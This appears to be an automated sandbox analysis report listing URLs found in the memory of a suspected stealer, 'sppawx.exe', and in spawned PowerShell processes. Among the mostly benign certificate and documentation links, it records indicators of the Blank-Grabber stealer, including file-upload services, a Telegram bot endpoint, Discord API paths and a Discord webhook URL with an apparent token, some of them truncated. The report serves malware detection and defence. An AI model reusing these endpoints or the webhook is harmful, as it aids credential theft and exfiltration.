              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: sppawx.exe, 00000002.00000003.1318997544.0000018C7F334000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1322409735.0000018C7F185000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1323907559.0000018C7F320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: sppawx.exe, 00000002.00000003.1451486952.0000018C7F704000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
              Source: sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
              Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/?fields=225545
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.a.0/sTy
              Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c.0/ti
              Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.hotosh
              Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adoraw-se
              Source: powershell.exe, 00000044.00000002.1605958223.000001AF5494D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.photo/
              Source: powershell.exe, 0000000B.00000002.1419951585.000002724448A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C7D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3E1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747473298.0000018C7E730000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000002.1761232233.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
              Source: powershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
              Source: powershell.exe, 0000000B.00000002.1393896936.0000027234638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: powershell.exe, 0000000B.00000002.1393896936.0000027234411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3C761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 0000000B.00000002.1393896936.0000027234638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: sppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
              Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: powershell.exe, 00000044.00000002.1539735870.000001AF3DD64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: sppawx.exe, 00000000.00000003.1298474849.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296348518.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295706195.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296170103.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295317056.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1300038265.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299579157.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299731609.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1296048416.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295934169.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1297309607.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295437976.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295181805.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1295602402.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1298063456.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, libffi-8.dll.0.dr, _socket.pyd.0.dr, _ssl.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
              Source: sppawx.exe, 00000002.00000002.1748781914.0000018C7F698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoftISPLA~1.PNGy./
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://MD8.mozilla.org/1/m
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02544000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://account.bellmedia.c
              Source: powershell.exe, 0000000B.00000002.1393896936.0000027234411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3C761000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://allegro.pl/
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.anonfiles.com/upload
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
              Source: sppawx.exe, 00000002.00000003.1615754397.0000018C01A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02568000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://bugzilla.mo
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
              Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
              Source: sppawx.exe, 00000000.00000003.1299420505.00000213D852C000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
              Source: sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
              Source: sppawx.exe, 00000002.00000002.1745991860.0000018C01D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1267176433306829014/YhEVi7QXrkO9uMJodvR8Fp2e6uTZlqxB6sVXodhGTQI4MPs
              Source: sppawx.exe, 00000002.00000003.1614878751.0000018C7F912000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1615754397.0000018C01A72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v
              Source: sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com/api/v9/users/
              Source: sppawx.exe, 00000002.00000002.1748026153.0000018C7F0B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
              Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747645212.0000018C7ECE0000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
              Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
              Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
              Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
              Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
              Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
              Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
              Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
              Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: sppawx.exe, 00000002.00000002.1745991860.0000018C01DDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
              Source: sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/Blank-Grabber
              Source: sppawx.exe, 00000002.00000003.1318450801.0000018C7F336000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318293950.0000018C7F3A2000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318879940.0000018C7F3C8000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1319218190.0000018C7F3CF000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318366035.0000018C7F334000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1318569360.0000018C01C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Blank-c/BlankOBF
              Source: powershell.exe, 00000044.00000002.1539735870.000001AF3E042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
              Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ED5C000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
              Source: sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
